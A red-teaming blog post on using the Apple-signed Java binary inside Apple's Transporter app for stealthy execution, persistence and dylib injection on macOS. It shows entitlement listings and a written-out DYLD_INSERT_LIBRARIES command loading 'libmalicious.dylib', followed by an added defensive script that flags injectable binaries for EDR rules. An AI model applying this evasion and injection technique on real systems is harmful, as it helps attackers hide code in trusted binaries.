macOS Red Teaming Tricks series
The idea of the #macOSRedTeamingTricks series is to share simple, ready-to-use tricks that may help you during macOS red teaming engagements.
There are a lot of different code execution and persistence methods on macOS, including ones that deliver your own interpreter or runtime environment, such as Java. Recently, I found out that Apple's Transporter app contains a working Java environment. So if you need a Java binary signed directly with the Apple Dev-ID certificate, go and grab it!
Why might it be useful?
- the Java executable will look less suspicious because it is signed with the Apple Dev-ID certificate, so you may avoid some detections
- you can create, for example, a launch agent that will execute your jar with the
- it allows injecting ad-hoc signed dynamic libraries even on M1 Macs
```
% codesign -d -vv /Applications/Transporter.app/Contents/itms/java/bin/java
Executable=/Applications/Transporter.app/Contents/itms/java/bin/java
Identifier=net.java.openjdk.cmd
Format=Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=768 flags=0x10000(runtime) hashes=13+7 location=embedded
Signature size=4698
Authority=Apple Mac OS Application Signing
Authority=Apple Worldwide Developer Relations Certification Authority
Authority=Apple Root CA
Info.plist entries=4
TeamIdentifier=K36BKF7T3D
Runtime Version=11.0.0
Sealed Resources=none
Internal requirements count=1 size=220
```
```
% codesign -d --entitlements - /Applications/Transporter.app/Contents/itms/java/bin/java
Executable=/Applications/Transporter.app/Contents/itms/java/bin/java
[Dict]
    [Key] com.apple.security.cs.debugger
    [Value]
        [Bool] true
    [Key] com.apple.security.cs.allow-jit
    [Value]
        [Bool] true
    [Key] com.apple.security.device.audio-input
    [Value]
        [Bool] true
    [Key] com.apple.security.cs.disable-library-validation
    [Value]
        [Bool] true
    [Key] com.apple.security.cs.allow-dyld-environment-variables
    [Value]
        [Bool] true
    [Key] com.apple.security.cs.allow-unsigned-executable-memory
    [Value]
        [Bool] true
```
It works on both x86 and ARM:
```
% lipo -archs /Applications/Transporter.app/Contents/itms/java/bin/java
x86_64 arm64
```
Code injection on M1 :-)
```
% DYLD_INSERT_LIBRARIES=./libmalicious.dylib /Applications/Transporter.app/Contents/itms/java/bin/java --version
2022-07-11 13:37:00.000 java[9121:59191] [+] Dylib injected
openjdk 14.0.2 2020-07-14
OpenJDK Runtime Environment 14.0.2-5906ce1373 (fastdebug build 14.0.2+12-iTunesOpenJDK-8)
OpenJDK 64-Bit Zero VM 14.0.2-5906ce1373 (fastdebug build 14.0.2+12-iTunesOpenJDK-8, interpreted mode)
```
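The reason the injection above works is visible in the two listings before it: the binary runs under the hardened runtime (`flags=0x10000(runtime)`), but its entitlements grant both `com.apple.security.cs.allow-dyld-environment-variables` (so `DYLD_INSERT_LIBRARIES` is honoured) and `com.apple.security.cs.disable-library-validation` (so a dylib that is not signed by Apple or the same Team ID is accepted). From a defender's side, that pair is what to hunt for on a fleet. The script below is an added example, not part of the original post: it parses the bracketed `[Key]`/`[Value]`/`[Bool]` layout that `codesign -d --entitlements -` printed above, lists the entitlements set to `true`, and classifies a binary as `INJECTABLE` only when both halves of the pair are present. The function names, the sample entitlement text (constructed to mirror the Transporter `java` output) and the `scan_dir` helper are my own; `audit_binary` and `scan_dir` need a real `codesign`, so they only do useful work on macOS, and on codesign versions that print a plist instead of the bracketed layout the parser would need adapting.

```shell
#!/bin/sh
# Added example (not from the original post): audit hardened-runtime
# entitlements for the combination that makes DYLD_INSERT_LIBRARIES of an
# ad-hoc signed dylib work. Parses the bracketed text format printed by
# `codesign -d --entitlements -` as shown in the post.

# Constructed sample, mirroring the entitlements of the Transporter java binary.
SAMPLE_ENTITLEMENTS='[Dict]
    [Key] com.apple.security.cs.debugger
    [Value]
        [Bool] true
    [Key] com.apple.security.cs.allow-jit
    [Value]
        [Bool] true
    [Key] com.apple.security.cs.disable-library-validation
    [Value]
        [Bool] true
    [Key] com.apple.security.cs.allow-dyld-environment-variables
    [Value]
        [Bool] true
    [Key] com.apple.security.cs.allow-unsigned-executable-memory
    [Value]
        [Bool] true'

# true_entitlements: read codesign entitlement text on stdin and print one
# entitlement key per line for every key whose value is "[Bool] true".
# Any value other than a true boolean (false, string, array, ...) clears the key.
true_entitlements() {
    awk '
        /\[Key\]/      { key = $2; next }
        /\[Value\]/    { next }
        /\[Bool\] true/ { if (key != "") print key }
                       { key = "" }
    '
}

# injection_risk: read entitlement text on stdin and print a single verdict:
#   INJECTABLE  both DYLD env vars and disabled library validation (the pair
#               exploited in the post)
#   DYLD-ENV    only DYLD environment variables are allowed
#   LIBVAL-OFF  only library validation is disabled
#   OK          neither entitlement is granted
injection_risk() {
    dyld=0; libval=0
    for k in $(true_entitlements); do
        case "$k" in
            com.apple.security.cs.allow-dyld-environment-variables) dyld=1 ;;
            com.apple.security.cs.disable-library-validation)       libval=1 ;;
        esac
    done
    if [ "$dyld" = 1 ] && [ "$libval" = 1 ]; then echo INJECTABLE
    elif [ "$dyld" = 1 ];   then echo DYLD-ENV
    elif [ "$libval" = 1 ]; then echo LIBVAL-OFF
    else echo OK
    fi
}

# audit_binary PATH: classify one Mach-O binary. Needs macOS codesign.
audit_binary() {
    command -v codesign >/dev/null 2>&1 || { echo "codesign not available" >&2; return 2; }
    codesign -d --entitlements - "$1" 2>/dev/null | injection_risk
}

# scan_dir DIR: report every executable under DIR whose verdict is INJECTABLE.
# Non-Mach-O files produce no entitlement output and are classified OK.
scan_dir() {
    find "$1" -type f -perm -u+x 2>/dev/null | while IFS= read -r f; do
        [ "$(audit_binary "$f")" = "INJECTABLE" ] && printf 'INJECTABLE %s\n' "$f"
    done
}

# Stand-alone demo on the constructed sample (prints INJECTABLE).
printf '%s\n' "$SAMPLE_ENTITLEMENTS" | injection_risk
```

On a Mac, `scan_dir /Applications` is the fleet-side use: each hit is a vendor-signed binary that will load an unrelated dylib if an attacker can set its environment, which is the condition a launch agent or a modified wrapper script gives them. Treat the hits as an allow-list input for EDR rules that alert on `DYLD_INSERT_LIBRARIES` being set for those specific executables.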